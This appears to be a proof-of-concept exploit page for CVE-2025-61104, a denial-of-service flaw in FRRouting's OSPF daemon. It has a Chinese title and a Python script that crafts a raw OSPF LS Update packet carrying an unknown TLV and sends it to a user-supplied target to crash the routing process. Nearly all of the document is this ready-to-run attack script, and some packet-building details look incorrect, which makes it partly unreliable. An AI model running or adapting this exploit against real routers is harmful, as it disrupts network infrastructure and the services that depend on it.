CVE-2025-61104 FRRouting frr OSPF协议NULL指针解引用拒绝服务漏洞

#!/usr/bin/env python3 # CVE-2025-61104 PoC - FRRouting OSPF NULL Pointer Dereference # This PoC triggers NULL pointer dereference in show_vty_unknown_tlv function # Usage: python3 cve_2025_61104_poc.py <target_ip> import socket import struct import sys def build_osfp_header(version, type_id, length, router_id, area_id): """Build OSPF packet header""" header = struct.pack('!BBH4s4s', version, # OSPF version (2 for OSPFv2) type_id, # Packet type (4 for LS Update) length, # Packet length router_id, # Source router ID area_id) # Area ID # Add authentication fields header += struct.pack('!Q', 0) # Auth type and auth data return header def build_lsa_header(ls_type, ls_id, adv_router, seq_num): """Build LSA header with malicious TLV""" age = 1 lsa_length = 60 # Minimal length with crafted TLV header = struct.pack('!HH4s4sIHH', age, lsa_length, ls_id, adv_router, seq_num, 0, # Checksum 0) # Length placeholder return header def build_malicious_tlv(): """Build crafted unknown TLV to trigger NULL dereference""" # Unknown TLV type that triggers show_vty_unknown_tlv tlv_type = 9999 tlv_length = 20 tlv_value = b'\x00' * tlv_length # NULL-inducing data tlv = struct.pack('!HH', tlv_type, tlv_length) + tlv_value return tlv def send_malicious_ospf_packet(target_ip): """Send crafted OSPF packet to trigger vulnerability""" sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, 89) # OSPF protocol sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) # OSPF Multicast address for AllSPFRouters target_addr = (target_ip, 89) # Build packet components router_id = b'\xc0\xa8\x01\x01' # 192.168.1.1 area_id = b'\xc0\xa8\x01\x00' # 192.168.1.0 lsa_header = build_lsa_header(10, router_id, router_id, 0x80000001) malicious_tlv = build_malicious_tlv() lsa_body = lsa_header + malicious_tlv ospf_packet = build_osfp_header(2, 4, len(lsa_body) + 24, router_id, area_id) ospf_packet += lsa_body print(f"[*] Sending malicious OSPF packet to {target_ip}...") print(f"[*] Packet size: {len(ospf_packet)} bytes") print(f"[*] Malicious TLV type: 9999, length: 20") sock.sendto(ospf_packet, target_addr) print("[+] Packet sent successfully") print("[!] Target may crash if vulnerable version of FRRouting is running") sock.close() if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) send_malicious_ospf_packet(sys.argv[1])